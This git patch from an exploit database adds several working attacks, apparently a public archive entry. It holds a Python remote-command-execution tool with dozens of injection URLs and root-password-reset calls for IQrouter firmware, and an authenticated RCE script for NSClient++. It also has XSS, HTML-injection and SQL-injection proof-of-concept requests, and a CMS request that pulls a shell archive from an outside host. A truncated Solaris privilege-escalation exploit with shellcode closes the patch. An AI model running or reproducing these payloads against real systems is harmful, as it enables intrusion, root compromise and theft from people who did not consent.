From 1c5c38825dbf284207635c6a8398c5e8b8bae2cf Mon Sep 17 00:00:00 2001 From: Offensive Security Date: Wed, 22 Apr 2020 05:01:47 +0000 Subject: [PATCH] DB: 2020-04-22 10 changes to exploits/shellcodes Oracle Solaris Common Desktop Environment 1.6 - Local Privilege Escalation WordPress 2.0.2 - 'cache' Remote Shell Injection Neowise CarbonFTP 1.4 - Insecure Proprietary Password Encryption WordPress Core 2.0.2 - 'cache' Remote Shell Injection CSZ CMS 1.2.7 - Persistent Cross-Site Scripting PMB 5.6 - 'logid' SQL Injection CSZ CMS 1.2.7 - 'title' HTML Injection IQrouter 3.3.1 Firmware - Remote Code Execution NSClient++ 0.5.2.35 - Authenticated Remote Code Execution jizhi CMS 1.6.7 - Arbitrary File Download P5 FNIP-8x16A FNIP-4xSH 1.0.20 - Cross-Site Request Forgery (Add Admin) Windows/x86 - MSVCRT System + Dynamic Null-free + Add RDP Admin + Disable Firewall + Enable RDP Shellcode (644 Bytes) --- exploits/hardware/webapps/48358.py | 339 ++++++++++++++++++++++++++++ exploits/hardware/webapps/48362.txt | 90 ++++++++ exploits/json/webapps/48360.txt | 192 ++++++++++++++++ exploits/php/webapps/48354.txt | 32 +++ exploits/php/webapps/48356.txt | 43 ++++ exploits/php/webapps/48357.txt | 27 +++ exploits/php/webapps/48361.txt | 46 ++++ exploits/solaris/local/48359.c | 320 ++++++++++++++++++++++++++ exploits/windows/remote/48363.py | 241 ++++++++++++++++++++ files_exploits.csv | 11 +- files_shellcodes.csv | 1 + shellcodes/windows/48355.c | 285 +++++++++++++++++++++++ 12 files changed, 1626 insertions(+), 1 deletion(-) create mode 100755 exploits/hardware/webapps/48358.py create mode 100644 exploits/hardware/webapps/48362.txt create mode 100644 exploits/json/webapps/48360.txt create mode 100644 exploits/php/webapps/48354.txt create mode 100644 exploits/php/webapps/48356.txt create mode 100644 exploits/php/webapps/48357.txt create mode 100644 exploits/php/webapps/48361.txt create mode 100644 exploits/solaris/local/48359.c create mode 100755 exploits/windows/remote/48363.py create mode 100644 shellcodes/windows/48355.c diff --git a/exploits/hardware/webapps/48358.py b/exploits/hardware/webapps/48358.py new file mode 100755 index 000000000..dc5fb38ab --- /dev/null +++ b/exploits/hardware/webapps/48358.py @@ -0,0 +1,339 @@ +# Exploit Title: IQrouter 3.3.1 Firmware - Remote Code Execution +# Date: 2020-04-21 +# Exploit Author: drakylar +# Vendor Homepage: https://evenroute.com/ +# Software Link: https://evenroute.com/iqrouter +# Version: IQrouter firmware up to 3.3.1 +# Tested on: IQrouter firmware 3.3.1 +# CVE : N/A + +#!/usr/bin/env python3 +import argparse +from sys import argv, exit + +try: + import requests +except ImportError: + print("Install requests lib! pip3 install requests") + + +print(""" +####################################################################### +# IQrouter multiple RCE and other vulnerabilities # +# by drakylar (Shaposhnikov Ilya) # +# CVE-2020-11963 CVE-2020-11964 CVE-2020-11966 # +# CVE-2020-11967 CVE-2020-11968 # +####################################################################### +""") + + +rce_setup = [ + [ + "/cgi-bin/luci/er/vlanTag?vlan_tag='`{}`'", + "RCE /vlanTag (vlan_tag param)" + ], + [ + "/cgi-bin/luci/er/verify_wifi?wifi_conflict='`{}`'", + "RCE /verify_wifi (wifi_conflict param). Need hide_wifi_config != true" + ], + [ + "/cgi-bin/luci/er/screen9?save_creds=1&s1&s2='`{}`'&p1&p2", + "RCE /screen9 (s2 param)" + ], + [ + "/cgi-bin/luci/er/screen9?save_creds=1&s1='`{}`'&s2&p1&p2", + "RCE /screen9 (s1 param)" + ], + [ + "/cgi-bin/luci/er/screen9?save_creds=1&s1&s2&p1&p2='`{}`'", + "RCE /screen9 (p2 param)" + ], + [ + "/cgi-bin/luci/er/screen9?save_creds=1&s1&s2&p1='`{}`'&p2", + "RCE /screen9 (p1 param)" + ], + [ + "/cgi-bin/luci/er/screen4?save_isp='`{}`", + "RCE /screen4 (save_isp param)" + ], + [ + "/cgi-bin/luci/er/screen2?set_wan_modem_interfaces='`{}`'", + "RCE /screen2 set_wan_modem_interfaces param)" + ], + [ + "/cgi-bin/luci/er/screen2?find_ip_address_conflict='`{}`'", + "RCE /screen2 find_ip_address_conflict param)" + ], + [ + "/cgi-bin/luci/er/screen10?set_security_question='`{}`'", + "RCE /screen10 (set_security_question param)" + ], + [ + "/cgi-bin/luci/er/screen10?set_security_answer='`{}`'&set_security_question=1", + "RCE /screen10 (set_security_answer param)"], + [ + "/cgi-bin/luci/er/screen1?zonename='`{}`'", + "RCE /screen1 (zonename param)" + ], + [ + "/cgi-bin/luci/er/register?email=`{}`", + "RCE /register (email param, result in /cgi-bin/luci/er/get_syslog for result)" + ] +] + +rce_any = [ + [ + "/cgi-bin/luci/er/wifi?enable_guestwifi=1&guest_key=2&disable_guestwifi=1&connection_test=1&disassociate_low_ack_update=1&guestwifi_2g_ssid=3&guestwifi_5g_ssid=4&get_network_details=1&switch_reset_wifi_mode=1&save_creds=1&s1=1&s2='`{}`'&p1=1&p2=1", + "RCE /wifi (s2 param)" + ], + [ + "/cgi-bin/luci/er/wifi?enable_guestwifi=1&guest_key=2&disable_guestwifi=1&connection_test=1&disassociate_low_ack_update=1&guestwifi_2g_ssid=3&guestwifi_5g_ssid=4&get_network_details=1&switch_reset_wifi_mode=1&save_creds=1&s1='`{}`'&s2=5&p1=6&p2=7", + "RCE /wifi (s1 param)" + ], + [ + "/cgi-bin/luci/er/wifi?enable_guestwifi=1&guest_key=2&disable_guestwifi=1&connection_test=1&disassociate_low_ack_update=1&guestwifi_2g_ssid=3&guestwifi_5g_ssid=4&get_network_details=1&switch_reset_wifi_mode=1&save_creds=1&s1=1&s2=2&p1=3&p2='`{}`'", + "RCE /wifi (p2 param)" + ], + [ + "/cgi-bin/luci/er/wifi?enable_guestwifi=1&guest_key=2&disable_guestwifi=1&connection_test=1&disassociate_low_ack_update=1&guestwifi_2g_ssid=3&guestwifi_5g_ssid=4&get_network_details=1&switch_reset_wifi_mode=1&save_creds=1&s1=1&s2=2&p1='`{}`'&p2=4", + "RCE /wifi (p1 param)" + ], + [ + "/cgi-bin/luci/er/wifi?enable_guestwifi=1&guest_key=2&disable_guestwifi=1&connection_test=1&disassociate_low_ack_update=1&guestwifi_2g_ssid=3&guestwifi_5g_ssid=`{}`&get_network_details=1&switch_reset_wifi_mode=1&save_creds=1&s1=4&s2=5&p1=6&p2=7", + "RCE /wifi (guestwifi_5g_ssid param)" + ], + [ + "/cgi-bin/luci/er/wifi?enable_guestwifi=1&guest_key=2&disable_guestwifi=1&connection_test=1&disassociate_low_ack_update=1&guestwifi_2g_ssid=`{}`&guestwifi_5g_ssid=3&get_network_details=1&switch_reset_wifi_mode=1&save_creds=1&s1=4&s2=5&p1=6&p2=7", + "RCE /wifi (guestwifi_2g_ssid param)" + ], + [ + "/cgi-bin/luci/er/wifi?enable_guestwifi=1&guest_key='`{}`'&disable_guestwifi=1&connection_test=1&disassociate_low_ack_update=1&guestwifi_2g_ssid=2&guestwifi_5g_ssid=3&get_network_details=1&switch_reset_wifi_mode=1&save_creds=1&s1=4&s2=5&p1=6&p2=7", + "RCE /wifi (guest_key param)" + ], + [ + "/cgi-bin/luci/er/wifi?enable_guestwifi='`{}`'&guest_key=2&disable_guestwifi=1&connection_test=1&disassociate_low_ack_update=1&guestwifi_2g_ssid=3&guestwifi_5g_ssid=4&get_network_details=1&switch_reset_wifi_mode=1&save_creds=1&s1=5&s2=6&p1=6&p2=7", + "RCE /wifi (enable_guestwifi param)" + ], + [ + "/cgi-bin/luci/er/screen11.1?email=`{}`®ister=123&uilog=123&bg=123", + "RCE /screen11.1 (email param)" + ], + [ + "/cgi-bin/luci/er/reboot_link?link='`{}`'", + "RCE /reboot_link (link param)" + ], + [ + "/cgi-bin/luci/er/diag_wifi/1/2/3/4/5/'`{}`'/", + "RCE /diag_wifi (htm5ghz param)" + ], + [ + "/cgi-bin/luci/er/diag_wifi/1/2/3/4/'`{}`'/6/", + "RCE /diag_wifi (htm2ghz param)" + ], + [ + "/cgi-bin/luci/er/diag_wifi/1/2/3/'`{}`'/5/6/", + "RCE /diag_wifi (c5ghz param)" + ], + [ + "/cgi-bin/luci/er/diag_wifi/1/2/'`{}`'/4/5/6/", + "RCE /diag_wifi (c2ghz param)" + ], + [ + "/cgi-bin/luci/er/diag_set_static_wan/'`{}`'/2/3/4/", + "RCE /diag_set_static_wan (static_ip param)" + ], + [ + "/cgi-bin/luci/er/diag_set_static_wan/1/'`{}`'/3/4/", + "RCE /diag_set_static_wan (net_mask param)" + ], + [ + "/cgi-bin/luci/er/diag_set_static_wan/1/2/'`{}`'/4/", + "RCE /diag_set_static_wan (gateway param)" + ], + [ + "/cgi-bin/luci/er/diag_set_static_wan/1/2/3/'`{}`'/", + "RCE /diag_set_static_wan (dns param)" + ], + [ + "/cgi-bin/luci/er/diag_set_static_modem/'`{}`'/2/3/", + "RCE /diag_set_static_modem (static_ip param)" + ], + [ + "/cgi-bin/luci/er/diag_set_static_modem/1/'`{}`'/3/", + "RCE /diag_set_static_modem (net_mask param)" + ], + [ + "/cgi-bin/luci/er/diag_set_static_modem/1/2/'`{}`'/", + "RCE /diag_set_static_modem (gateway param)" + ], + [ + "/cgi-bin/luci/er/diag_set_device_name_and_sync/'`{}`'/", + "RCE /diag_set_device_name_and_sync (device_name param)" + ], + [ + "/cgi-bin/luci/er/diag_set_device_name/'`{}`'/", + "RCE /diag_set_device_name (device_name param)" + ], + [ + "/cgi-bin/luci/er/diag_pppoe_update/'`{}`'/passs/", + "RCE /diag_pppoe_update (wan_username param)" + ], + [ + "/cgi-bin/luci/er/diag_pppoe_update/aaadmin/'`{}`'/", + "RCE /diag_pppoe_update (wan_password param)" + ], + [ + "/cgi-bin/luci/er/diag_pppoe/'`{}`'/passsswd/", + "RCE /diag_pppoe (wan_username param)" + ], + [ + "/cgi-bin/luci/er/diag_pppoe/aaadmin/'`{}`'/", + "RCE /diag_pppoe (wan_password param)" + ], + [ + "/cgi-bin/luci/er/diag_pppoa_update/'`{}`'/paaaasword/", + "RCE /diag_pppoa_update (wan_username param)" + ], + [ + "/cgi-bin/luci/er/diag_pppoa_update/aaadmin/'`{}`'/", + "RCE /diag_pppoa_update (wan_password param)" + ], + [ + "/cgi-bin/luci/er/diag_pppoa/'`{}`'/passs/", + "RCE /diag_pppoa (wan_username param)" + ], + [ + "/cgi-bin/luci/er/diag_pppoa/aaadmin/'`{}`'/", + "RCE /diag_pppoa (wan_password param)" + ], + [ + "/cgi-bin/luci/er/advanced_link?link='`{}`'", + "RCE /advanced_link (link param)" + ] + +] + +advanced_payloads = [ + [ + "/cgi-bin/luci/er/reboot_link?reboot=1", + "Reboot IQrouter (/reboot_link reboot param))" + ], + [ + "/cgi-bin/luci/er/screen2?reboot=1", + "Reboot IQrouter (/screen2 reboot param))" + ], + [ + "/cgi-bin/luci/er/index?reset_config=1", + "Reset IQrouter (/index reset_config param)" + ], + [ + "/cgi-bin/luci/er/screen7?upgrade=1", + "Upgrade IQrouter (/screen7 upgrade param)" + ], + [ + "/cgi-bin/luci/er/vlanTag?restart_network=1", + "Restart network (/vlanTag restart_network param)" + ], + [ + "/cgi-bin/luci/er/diag_iperf_cmd/start", + "Start iperf script (/diag_iperf_cmd/start)" + ], + [ + "/cgi-bin/luci/er/diag_iperf_cmd/stop", + "Stop iperf script (/diag_iperf_cmd/stop)" + ], + [ + "/cgi-bin/luci/er/get_syslog", + "Router setup info log (/get_syslog)" + ], + [ + "/cgi-bin/luci/er/diag_set_password/c00lpasswd/", + "Change root password to c00lpasswd (can change in code)" + ], + [ + "/cgi-bin/luci/er/reset_password/", + "Change root password to 'changeme' (static)" + ] +] + + +def print_payloads(): + print('#' * 30) + print("Payloads list") + num = 1 + print('######################### RCE without auth ########################') + for payload in rce_any: + print("{} - {}".format(num, payload[1])) + num += 1 + + print( + '############### RCE (router need to be in setup mode) ###############') + for payload in rce_setup: + print("{} - {}".format(num, payload[1])) + num += 1 + + print( + '######################### Advanced payloads #########################') + for payload in advanced_payloads: + print("{} - {}".format(num, payload[1])) + num += 1 + + +parser = argparse.ArgumentParser(description="IQrouter multiple RCE") +parser.add_argument('--host', help='Host', type=str) +parser.add_argument('-p', '--port', help='Web port (default: 80)', default=80, type=int) +parser.add_argument('-n', '--num', help='Payload number', + default=0, type=int) +parser.add_argument('-c', '--cmd', help='Command to execute (default: pwd)', + default="pwd", type=str) +parser.add_argument('--protocol', help='Protocol (http/https)', + default="http", type=str) + +args = parser.parse_args() + + +def main(): + print("") + full_payload_list = rce_setup + rce_any + advanced_payloads + payloads_amount = len(full_payload_list) + try: + hostname = args.host + port = args.port + payload_num = int(args.num) + bash_cmd = args.cmd + protocol = args.protocol + + if payload_num < 1 or payload_num > payloads_amount: + print("Error with payload number!") + raise IndexError + if port < 0 or port > 65535: + print("Error with port number") + raise IndexError + if protocol not in ['http', 'https']: + print("Error with protocol name") + raise IndexError + + current_payload = full_payload_list[payload_num - 1] + print("Payload: {}".format(current_payload[1])) + print("Host: {}".format(hostname)) + print("Port: {}".format(port)) + print("Protocol: {}".format(protocol)) + print("Command: {}".format(bash_cmd)) + + full_url = "{}://{}:{}{}".format(protocol, hostname, port, + current_payload[0].format(bash_cmd)) + print("Built URL: {}".format(full_url)) + + r = requests.get(full_url) + print("Status code: {}".format(r.status_code)) + return + except IndexError: + parser.print_help() + print_payloads() + exit(1) + + +if __name__ == '__main__': + print( + "\n\nWarning: use TABS(doesn't work in some payloads) or ${IFS} for space.") + exit(main()) \ No newline at end of file diff --git a/exploits/hardware/webapps/48362.txt b/exploits/hardware/webapps/48362.txt new file mode 100644 index 000000000..671415866 --- /dev/null +++ b/exploits/hardware/webapps/48362.txt @@ -0,0 +1,90 @@ +# Exploit Title: P5 FNIP-8x16A FNIP-4xSH 1.0.20 - Cross-Site Request Forgery (Add Admin) +# Google Dork:jizhicms +# Date: 2020-04-18 +# Exploit Author: iej1ctk1g +# Product web page: https://www.p5.hu +# Affected version: 1.0.20, 1.0.11 +# CVE : N/A + + + + + + + +
+ + + + + + + +
+ + + + + + +
+ + + + +
+ + + + + + +
+ + + + + + +
+ + \ No newline at end of file diff --git a/exploits/json/webapps/48360.txt b/exploits/json/webapps/48360.txt new file mode 100644 index 000000000..93eebe24e --- /dev/null +++ b/exploits/json/webapps/48360.txt @@ -0,0 +1,192 @@ +# Exploit Title: NSClient++ 0.5.2.35 - Authenticated Remote Code Execution +# Google Dork: N/A +# Date: 2020-04-20 +# Exploit Author: kindredsec +# Vendor Homepage: https://nsclient.org/ +# Software Link: https://nsclient.org/download/ +# Version: 0.5.2.35 +# Tested on: Microsoft Windows 10 Pro (x64) +# CVE: N/A +# +# NSClient++ is a monitoring agent that has the option to run external scripts. +# This feature can allow an attacker, given they have credentials, the ability to execute +# arbitrary code via the NSClient++ web application. Since it runs as NT Authority/System bt +# Default, this leads to privileged code execution. + +#!/usr/bin/env python3 + +import requests +from bs4 import BeautifulSoup as bs +import urllib3 +import json +import sys +import random +import string +import time +import argparse +urllib3.disable_warnings(urllib3.exceptions.InsecureRequestWarning) + +def generateName(): + + letters = string.ascii_lowercase + string.ascii_uppercase + return ''.join(random.choice(letters) for i in range(random.randint(8,13))) + +def printStatus(message, msg_type): + + C_YELLOW = '\033[1;33m' + C_RESET = '\033[0m' + C_GREEN = '\033[1;32m' + C_RED = '\033[1;31m' + + if msg_type == "good": + green_plus = C_GREEN + "[+]" + C_RESET + string = green_plus + " " + message + + elif msg_type == "info": + yellow_ex = C_YELLOW + "[!]" + C_RESET + string = yellow_ex + " " + message + + elif msg_type == "bad": + red_minus = C_RED + "[-]" + C_RESET + string = red_minus + " " + message + + print(string) + + +# This function adds a new external script containing the desired +# command, then saves the configuration +def configurePayload(session, cmd, key): + + printStatus("Configuring Script with Specified Payload . . .", "info") + endpoint = "/settings/query.json" + node = { "path" : "/settings/external scripts/scripts", + "key" : key } + value = { "string_data" : cmd } + update = { "node" : node , "value" : value } + payload = [ { "plugin_id" : "1234", + "update" : update } ] + json_data = { "type" : "SettingsRequestMessage", "payload" : payload } + + out = session.post(url = base_url + endpoint, json=json_data, verify=False) + if "STATUS_OK" not in str(out.content): + printStatus("Error configuring payload. Hit error at: " + endpoint, "bad") + sys.exit(1) + + printStatus("Added External Script (name: " + key + ")", "good") + time.sleep(3) + printStatus("Saving Configuration . . .", "info") + header = { "version" : "1" } + payload = [ { "plugin_id" : "1234", "control" : { "command" : "SAVE" }} ] + json_data = { "header" : header, "type" : "SettingsRequestMessage", "payload" : payload } + + session.post(url = base_url + endpoint, json=json_data, verify=False) + + +# Since the application needs to be restarted after making changes, +# this function reloads the application, and waits for it to come back. +def reloadConfig(session): + + printStatus("Reloading Application . . .", "info") + endpoint = "/core/reload" + session.get(url = base_url + endpoint, verify=False) + + # Wait until the application successfully reloads by making a request + # every 10 seconds until it responds. + printStatus("Waiting for Application to reload . . .", "info") + time.sleep(10) + response = False + count = 0 + while not response: + try: + out = session.get(url = base_url, verify=False, timeout=10) + if len(out.content) > 0: + response = True + except: + count += 1 + if count > 10: + printStatus("Application failed to reload. Nice DoS exploit! /s", "bad") + sys.exit(1) + else: + continue + + +# This function makes the call to the new external script to +# ultimately execute the code. +def triggerPayload(session, key): + + printStatus("Triggering payload, should execute shortly . . .", "info") + endpoint = "/query/" + key + try: + session.get(url = base_url + endpoint, verify=False, timeout=10) + except requests.exceptions.ReadTimeout: + printStatus("Timeout exceeded. Assuming your payload executed . . .", "info") + sys.exit(0) + + +# Before setting up the exploit, this function makes sure the +# required feature (External Scripts) is enabled on the application. +def enableFeature(session): + + printStatus("Enabling External Scripts Module . . .", "info") + endpoint = "/registry/control/module/load" + params = { "name" : "CheckExternalScripts" } + out = session.get(url = base_url + endpoint, params=params, verify=False) + if "STATUS_OK" not in str(out.content): + printStatus("Error enabling required feature. Hit error at: " + endpoint, "bad") + sys.exit(1) + + +# This function obtains an authentication token that gets added to all +# remaining headers. +def getAuthToken(session): + + printStatus("Obtaining Authentication Token . . .", "info") + endpoint = "/auth/token" + params = { "password" : password } + auth = session.get(url = base_url + endpoint, params=params, verify=False) + if "auth token" in str(auth.content): + j = json.loads(auth.content) + authToken = j["auth token"] + printStatus("Got auth token: " + authToken, "good") + return authToken + else: + printStatus("Error obtaining auth token, is your password correct? Hit error at: " + endpoint, "bad") + sys.exit(1) + + + +parser = argparse.ArgumentParser("NSClient++ 0.5.2.35 Authenticated RCE") +parser.add_argument('-t', nargs='?', metavar='target', help='Target IP Address.') +parser.add_argument('-P', nargs='?', metavar='port', help='Target Port.') +parser.add_argument('-p', nargs='?', metavar='password', help='NSClient++ Administrative Password.') +parser.add_argument('-c', nargs='?', metavar='command', help='Command to execute on target') +args = parser.parse_args() + +if len(sys.argv) < 4: + parser.print_help() + sys.exit(1) + +# Build base URL, grab needed arguments +base_url = "https://" + args.t + ":" + args.P +printStatus("Targeting base URL " + base_url, "info") +password = args.p +cmd = args.c + +# Get first auth token, and add it to headers of session +s = requests.session() +token = getAuthToken(s) +s.headers.update({ "TOKEN" : token}) + +# Generate a random name, enable the feature, add the payload, +# then reload. +randKey = generateName() +enableFeature(s) +configurePayload(s, cmd, randKey) +reloadConfig(s) + +# Since application was reloaded, need a new auth token. +token = getAuthToken(s) +s.headers.update({ "TOKEN" : token}) + +# Execute our code. +triggerPayload(s, randKey) \ No newline at end of file diff --git a/exploits/php/webapps/48354.txt b/exploits/php/webapps/48354.txt new file mode 100644 index 000000000..c97757266 --- /dev/null +++ b/exploits/php/webapps/48354.txt @@ -0,0 +1,32 @@ +# Exploit Title: CSZ CMS 1.2.7 - Persistent Cross-Site Scripting +# Exploit Author: Metin Yunus Kandemir +# Vendor Homepage: https://www.cszcms.com/ +# Software Link: https://sourceforge.net/projects/cszcms/ +# Version: v1.2.7 +# Description: +# Unauthorized user that has access private message can embed Javascript +# code to admin panel. + +# Steps to reproduce: +1- Log in to member panel. +1- Change user-agent header as +2- Send the private message to admin user. +3- When admin user logs in to Backend System Dashboard, an alert box pops +up on screen. + +PoC Request: + +POST /CSZCMS-V1.2.7/member/insertpm/ HTTP/1.1 +Host: localhost +User-Agent: +Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8 +Accept-Language: en-US,en;q=0.5 +Accept-Encoding: gzip, deflate +Referer: http://localhost/CSZCMS-V1.2.7/member/newpm +Content-Type: application/x-www-form-urlencoded +Content-Length: 152 +Cookie: cszcookie +Connection: close +Upgrade-Insecure-Requests: 1 + +csrf_csz=*&csrf_csz=*&to%5B%5D=1&title=user-agent&message=user-agent&submit=Send \ No newline at end of file diff --git a/exploits/php/webapps/48356.txt b/exploits/php/webapps/48356.txt new file mode 100644 index 000000000..fce82ae1b --- /dev/null +++ b/exploits/php/webapps/48356.txt @@ -0,0 +1,43 @@ +# Exploit Title: PMB 5.6 - 'logid' SQL Injection +# Google Dork: inurl:opac_css +# Date: 2020-04-20 +# Exploit Author: 41-trk (Tarik Bakir) +# Vendor Homepage: http://www.sigb.net +# Software Link: http://forge.sigb.net/redmine/projects/pmb/files +# Affected versions : <= 5.6 + +-==== Software Description ====- + +PMB is a completely free ILS (Integrated Library management System). The domain of software for libraries is almost exclusively occupied by proprietary products. +We are some librarians, users and developers deploring this state of affairs. + +PMB is based on web technology. This is what we sometimes call a 'web-app'. +PMB requires an HTTP server (such as Apache, but this is not an obligation), the MySQL database and the PHP language. + +The main functions of PMB are : + + * Supporting the UNIMARC format + * Authorities management (authors, publishers, series, subjects...) + * Management of loans, holds, borrowers... + * A user-friendly configuration + * The ability to import full bibliographic records + * A user-friendly OPAC integrating a browser + * Loans management with a module designed to serve even the very small establishments + * Serials management + * Simple administration procedures that can be handled easily even by the library staff... + +-==== Vulnerability ====- + +Variable $logid isn't properly sanitized in file /admin/sauvegarde/download.php, which allows ADMINISTRATION_AUTH to execute arbitrary SQL commands via the id parameter. + +-==== POC ====- + +http://localhost/[PMB_PATH]/admin/sauvegarde/download.php?logid=1 [SQLI] + +Using SQLMAP : + +./sqlmap.py -u "http://localhost/[PMB_PATH]/admin/sauvegarde/download.php?logid=1" -p logid --headers="Cookie: [VALID_USER_COOKIE]" --passwords + +-==== Exploit requirements ====- + +- You will need to be logged in in order to exploit the vulnerability. \ No newline at end of file diff --git a/exploits/php/webapps/48357.txt b/exploits/php/webapps/48357.txt new file mode 100644 index 000000000..1b33d4bfa --- /dev/null +++ b/exploits/php/webapps/48357.txt @@ -0,0 +1,27 @@ +# Exploit Title: CSZ CMS 1.2.7 - 'title' HTML Injection +# Exploit Author: Metin Yunus Kandemir +# Vendor Homepage: https://www.cszcms.com/ +# Software Link: https://sourceforge.net/projects/cszcms/ +# Version: v1.2.7 +# Description: +# Authenticated user can inject hyperlink to Backend System Dashboard and +# Member Dashboard via message. + +PoC Request: + +POST /CSZCMS-V1.2.7/member/insertpm/ HTTP/1.1 +Host: localhost +User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:60.0) Gecko/20100101 +Firefox/60.0 +Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8 +Accept-Language: en-US,en;q=0.5 +Accept-Encoding: gzip, deflate +Referer: http://localhost/CSZCMS-V1.2.7/member/newpm +Content-Type: application/x-www-form-urlencoded +Content-Length: 196 +Cookie: cszcookie +Connection: close +Upgrade-Insecure-Requests: 1 + +csrf_csz=*&csrf_csz=*&to%5B%5D=1&title=

Please +click to view

&message=phishing&submit=Send \ No newline at end of file diff --git a/exploits/php/webapps/48361.txt b/exploits/php/webapps/48361.txt new file mode 100644 index 000000000..111f38335 --- /dev/null +++ b/exploits/php/webapps/48361.txt @@ -0,0 +1,46 @@ +# Exploit Title: jizhi CMS 1.6.7 - Arbitrary File Download +# Google Dork: jizhicms +# Date: 2020-04-18 +# Exploit Author: iej1ctk1g +# Vendor Homepage: https://www.jizhicms.cn/ +# Software Link: http://down.jizhicms.cn/jizhicms_Beta1.6.7.zip +# Version: 1.6.7 +# Tested on: Mac OS +# CVE : N/A + +Data 1. + +POST /admin.php/Plugins/update.html HTTP/1.1 +Host: 192.168.1.253:8888 +Content-Length: 86 +Accept: application/json, text/javascript, */*; q=0.01 +X-Requested-With: XMLHttpRequest +User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_3) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/80.0.3987.149 Safari/537.36 +Content-Type: application/x-www-form-urlencoded; charset=UTF-8 +Origin: http://192.168.1.253:8888 +Referer: http://192.168.1.253:8888/admin.php/Plugins/index.html +Accept-Encoding: gzip, deflate +Accept-Language: zh-CN,zh;q=0.9,en;q=0.8 +Cookie: PHPSESSID=32db2410f5d69bf21ba9b21ab8093a09 +Connection: close + +action=start-download&filepath=shell&download_url=http://39.105.143.130:9090/shell.zip + + +Data 2. + +POST /admin.php/Plugins/update.html HTTP/1.1 +Host: 192.168.1.253:8888 +Content-Length: 32 +Accept: application/json, text/javascript, */*; q=0.01 +X-Requested-With: XMLHttpRequest +User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_3) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/80.0.3987.149 Safari/537.36 +Content-Type: application/x-www-form-urlencoded; charset=UTF-8 +Origin: http://192.168.1.253:8888 +Referer: http://192.168.1.253:8888/admin.php/Plugins/index.html +Accept-Encoding: gzip, deflate +Accept-Language: zh-CN,zh;q=0.9,en;q=0.8 +Cookie: PHPSESSID=32db2410f5d69bf21ba9b21ab8093a09 +Connection: close + +action=file-upzip&filepath=shell \ No newline at end of file diff --git a/exploits/solaris/local/48359.c b/exploits/solaris/local/48359.c new file mode 100644 index 000000000..1895c1312 --- /dev/null +++ b/exploits/solaris/local/48359.c @@ -0,0 +1,320 @@ +# Title: Oracle Solaris Common Desktop Environment 1.6 - Local Privilege Escalation +# Date: 2020-04-21 +# Author: Marco Ivaldi +# Vendor: www.oracle.com +# CVE: CVE-2020-2944 + +/* + * raptor_sdtcm_conv.c - CDE sdtcm_convert LPE for Solaris/Intel + * Copyright (c) 2019-2020 Marco Ivaldi + * + * A buffer overflow in the _SanityCheck() function in the Common Desktop + * Environment version distributed with Oracle Solaris 10 1/13 (Update 11) and + * earlier allows local users to gain root privileges via a long calendar name + * or calendar owner passed to sdtcm_convert in a malicious calendar file + * (CVE-2020-2944). + * + * The open source version of CDE (based on the CDE 2.x codebase) is not + * affected, because it does not ship the vulnerable binary. + * + * "CDE, the gift that keeps on giving" -- @0xdea + * "Feels more like a curse you can't break from this side." -- @alanc + * + * This exploit uses the ret-into-ld.so technique to bypass the non-exec stack + * protection. In case troubles arise with NULL-bytes inside the ld.so.1 memory + * space, try returning to sprintf() instead of strcpy(). + * + * I haven't written a Solaris/SPARC version because I don't have a SPARC box + * on which Solaris 10 can run. If anybody is kind enough to give me access to + * such a box, I'd be happy to port my exploit to Solaris/SPARC as well. + * + * Usage: + * $ gcc raptor_sdtcm_conv.c -o raptor_sdtcm_conv -Wall + * $ ./raptor_sdtcm_conv + * [...] + * Do you want to correct it? (Y/N) [Y] n + * # id + * uid=0(root) gid=1(other) egid=12(daemon) + * # + * + * This should work with any common configuration on the first try. To + * re-enable rpc.cmsd, clear its service maintenance status by running the + * following commands as root: + * # /usr/sbin/svcadm clear cde-calendar-manager + * # /usr/bin/svcs -a | grep calendar + * online 13:16:54 svc:/network/rpc/cde-calendar-manager:default + * + * Tested on: + * SunOS 5.10 Generic_147148-26 i86pc i386 i86pc (Solaris 10 1/13) + * [previous Solaris versions are also likely vulnerable] + */ + +#include +#include +#include +#include +#include +#include +#include +#include +#include +#include + +#define INFO1 "raptor_sdtcm_conv.c - CDE sdtcm_convert LPE for Solaris/Intel" +#define INFO2 "Copyright (c) 2019-2020 Marco Ivaldi " + +#define VULN "/usr/dt/bin/sdtcm_convert" // the vulnerable program +#define ADMIN "/usr/dt/bin/sdtcm_admin" // calendar admin utility +#define BUFSIZE 2304 // size of the name/owner +#define PAYSIZE 1024 // size of the payload +#define OFFSET env_len / 2 // offset to the shellcode + +char sc[] = /* Solaris/x86 shellcode (8 + 8 + 27 = 43 bytes) */ +/* double setuid() */ +"\x31\xc0\x50\x50\xb0\x17\xcd\x91" +"\x31\xc0\x50\x50\xb0\x17\xcd\x91" +/* execve() */ +"\x31\xc0\x50\x68/ksh\x68/bin" +"\x89\xe3\x50\x53\x89\xe2\x50" +"\x52\x53\xb0\x3b\x50\xcd\x91"; + +/* globals */ +char *env[256]; +int env_pos = 0, env_len = 0; + +/* prototypes */ +int add_env(char *string); +void check_zero(int addr, char *pattern); +int search_ldso(char *sym); +int search_rwx_mem(void); +void set_val(char *buf, int pos, int val); + +/* + * main() + */ +int main(int argc, char **argv) +{ + char buf[BUFSIZE], payload[PAYSIZE]; + char platform[256], release[256], hostname[256]; + int i, payaddr; + + char *arg[3] = {"foo", "hax0r", NULL}; + int sb = ((int)argv[0] | 0xfff); /* stack base */ + int ret = search_ldso("strcpy"); /* or sprintf */ + int rwx_mem = search_rwx_mem(); /* rwx memory */ + + char cmd[1024]; + FILE *fp; + + /* print exploit information */ + fprintf(stderr, "%s\n%s\n\n", INFO1, INFO2); + + /* read command line */ + if (argc != 1) { + fprintf(stderr, "Usage:\n%s\n[...]\n", argv[0]); + fprintf(stderr, "Do you want to correct it? (Y/N) [Y] n\n\n"); + exit(1); + } + + /* get system information */ + sysinfo(SI_PLATFORM, platform, sizeof(platform) - 1); + sysinfo(SI_RELEASE, release, sizeof(release) - 1); + sysinfo(SI_HOSTNAME, hostname, sizeof(release) - 1); + + /* prepare the payload (NOPs suck, but I'm too old for VOODOO stuff) */ + memset(payload, '\x90', PAYSIZE); + payload[PAYSIZE - 1] = 0x0; + memcpy(&payload[PAYSIZE - sizeof(sc)], sc, 